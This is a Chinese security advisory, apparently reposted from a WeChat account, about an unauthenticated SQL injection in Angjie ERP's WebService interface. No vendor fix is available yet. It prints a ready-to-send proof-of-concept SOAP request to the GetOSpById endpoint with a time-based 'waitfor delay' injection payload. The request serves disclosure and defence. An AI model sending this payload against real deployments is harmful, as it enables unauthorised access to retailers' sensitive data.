漏洞预警 | 昂捷ERP SQL注入漏洞

admin

102777
文章

87
评论

2023年11月24日09:58:37评论51 views字数 988阅读3分17秒阅读模式

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

昂捷信息，以软件开发为核心，聚焦于零售行业数字化赋能，为超市、便利店、百货、购物中心、专营专卖等各零售业态提供全面的数字化解决方案和咨询服务，是业界领先的全链路数字化解决方案服务商。

漏洞预警 | 昂捷ERP SQL注入漏洞

0x03 漏洞详情

漏洞类型：SQL注入

影响：获取敏感信息

简述：昂捷ERP WebService接口存在SQL注入漏洞，未经身份验证的攻击者可以利用该漏洞泄露系统敏感信息。

0x04 影响版本

昂捷ERP

0x05 POC

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1Host: xxxxxUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Connection: closeContent-Length: 369Accept: */*Accept-Language: enContent-Type: text/xml; charset=utf-8Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <GetOSpById xmlns="http://tempuri.org/">      <sId>1';waitfor delay '0:0:5'--+</sId>    </GetOSpById>  </soap:Body></soap:Envelope>

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方暂无发布漏洞修复版本，建议用户关注官网动态：

https://www.enjoyit.com.cn/

原文始发于微信公众号（浅安安全）：漏洞预警 | 昂捷ERP SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞预警 | 昂捷ERP SQL注入漏洞

暂无

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信